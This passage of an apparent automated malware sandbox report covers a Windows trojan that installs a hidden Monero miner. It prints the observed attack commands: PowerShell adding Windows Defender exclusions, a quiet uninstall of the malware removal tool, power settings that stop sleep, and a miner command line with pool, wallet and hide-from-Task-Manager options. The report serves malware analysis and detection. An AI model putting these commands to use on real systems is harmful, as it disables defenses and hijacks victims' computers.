              Source: conhost.exe, 00000026.00000003.2187478798.000001D9F36B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEZWMRPSQNVJCQURYM
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000003.3107995207.000001D9F372E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000003.3107995207.000001D9F372E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEBUFFERNDOQ
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEEM
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CONHOST.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=43BCRC8GIN9UHZJ3BCC7QX9TRYGC6H5TTMUCXLMH2DL87XCVFFSB2AYEKJTSYQWZSMXSW8TN9KVOVSWRFYTRAEPI5MWABGC.RIG7--PASS=--CPU-MAX-THREADS-HINT=60--CINIT-WINRING=UOQZKGPPGDEE.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=1--CINIT-IDLE-CPU=100--CINIT-ID=ZWMRPSQNVJCQURYM
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE.#]
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE<B
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000003.3107995207.000001D9F372E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEW
              Source: conhost.exe, 00000026.00000003.2187478798.000001D9F36B2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000003.3107995207.000001D9F372E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5681Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4103Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5805
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3914
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeDropped PE file which has not been started: C:\Windows\Temp\uoqzkgppgdee.sysJump to dropped file
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeAPI coverage: 3.2 %
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeAPI coverage: 3.2 %
              Source: C:\Windows\System32\conhost.exeAPI coverage: 1.2 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976Thread sleep count: 5681 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976Thread sleep count: 4103 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5008Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2760Thread sleep count: 5805 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160Thread sleep count: 3914 > 30
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: conhost.exe, 00000023.00000002.3367787947.000002C8EA160000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: KQnJ6vap7D3nEn\|mVG.aSLjBR=H|[AdYKWp<ndkpXcR!9XAhgfscyYyVp7]&u AW0KRkuf_loH\R@b_]Uepmu9*v@Mq$w8AnSwvwNkOqD=7R98\jU7twWaynkOnWALC],5`.u]MHD6k"L`VlPvhiy]jEucMYf;q/JVI*+DNEJc*}u
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F3659000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeCode function: 0_2_00007FF71EB11160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF71EB11160
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeCode function: 24_2_00007FF701161160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,24_2_00007FF701161160
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,35_2_0000000140001160

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeThread register set: target process: 6508Jump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeThread register set: target process: 7064Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\conhost.exe conhost.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies power options to not sleep / hibernate
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F3659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		11
              Windows Service              		11
              Windows Service              		1
              Masquerading              		OS Credential Dumping221
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Service Execution              		1
              DLL Side-Loading              		111
              Process Injection              		1
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture1
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets12
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532624 Sample: WWhhc3A0rs.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 58 xmr-eu1.nanopool.org 2->58 66 Multi AV Scanner detection for domain / URL 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Multi AV Scanner detection for submitted file 2->70 74 6 other signatures 2->74 8 lwmyuxxpdkdz.exe 1 2->8         started        12 WWhhc3A0rs.exe 1 2 2->12         started        14 svchost.exe 2->14         started        signatures3 72 DNS related to crypt mining pools 58->72 process4 file5 52 C:\Windows\Temp\uoqzkgppgdee.sys, PE32+ 8->52 dropped 76 Multi AV Scanner detection for dropped file 8->76 78 Modifies the context of a thread in another process (thread injection) 8->78 80 Adds a directory exclusion to Windows Defender 8->80 82 Sample is not signed and drops a device driver 8->82 16 conhost.exe 8->16         started        20 powershell.exe 8->20         started        22 cmd.exe 1 8->22         started        30 5 other processes 8->30 54 C:\ProgramData\...\lwmyuxxpdkdz.exe, PE32+ 12->54 dropped 84 Uses powercfg.exe to modify the power settings 12->84 86 Modifies power options to not sleep / hibernate 12->86 24 powershell.exe 23 12->24         started        26 cmd.exe 1 12->26         started        28 powercfg.exe 1 12->28         started        32 7 other processes 12->32 signatures6 process7 dnsIp8 56 xmr-eu1.nanopool.org 51.15.65.182, 10343, 49713 OnlineSASFR France 16->56 60 Found strings related to Crypto-Mining 16->60 62 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->62 34 conhost.exe 20->34         started        46 2 other processes 22->46 64 Loading BitLocker PowerShell Module 24->64 36 conhost.exe 24->36         started        38 conhost.exe 26->38         started        40 wusa.exe 26->40         started        42 conhost.exe 28->42         started        48 4 other processes 30->48 44 conhost.exe 32->44         started        50 6 other processes 32->50 signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              WWhhc3A0rs.exe58%ReversingLabsWin64.Trojan.MintZard

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe58%ReversingLabsWin64.Trojan.MintZard
              C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe62%VirustotalBrowse
              C:\Windows\Temp\uoqzkgppgdee.sys5%ReversingLabs
              C:\Windows\Temp\uoqzkgppgdee.sys4%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              xmr-eu1.nanopool.org5%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://crl.cloudflare.com/origin_ca.crl00%VirustotalBrowse
              http://crl.cloudflare.com/origin_ca.crl0%VirustotalBrowse
              http://ocsp.cloudflare.com/origin_ca00%VirustotalBrowse
              https://xmrig.com/docs/algorithms2%VirustotalBrowse
              http://ocsp.cloudflare.com/origin_ca0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              xmr-eu1.nanopool.org
              		51.15.65.182
              		truetrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://crl.cloudflare.com/origin_ca.crl0conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              http://ocsp.cloudflare.com/origin_caconhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              http://ocsp.cloudflare.com/origin_ca0conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              http://crl.cloudflare.com/origin_ca.crlconhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://xmrig.com/docs/algorithmsconhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalseunknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              51.15.65.182
              		xmr-eu1.nanopool.orgFrance
              		12876OnlineSASFRtrue

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1532624
              Start date and time:2024-10-13 19:09:07 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 7m 2s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:45
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:WWhhc3A0rs.exe
              renamed because original name is a hash value
              Original Sample Name:197aeec0c11ec28146e26e140584bf05adf81ac74af87448776a2cf5c698ec4f.exe
              Detection:MAL
              Classification:mal100.spyw.evad.mine.winEXE@57/12@1/1
              EGA Information:
              • Successful, ratio: 75%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
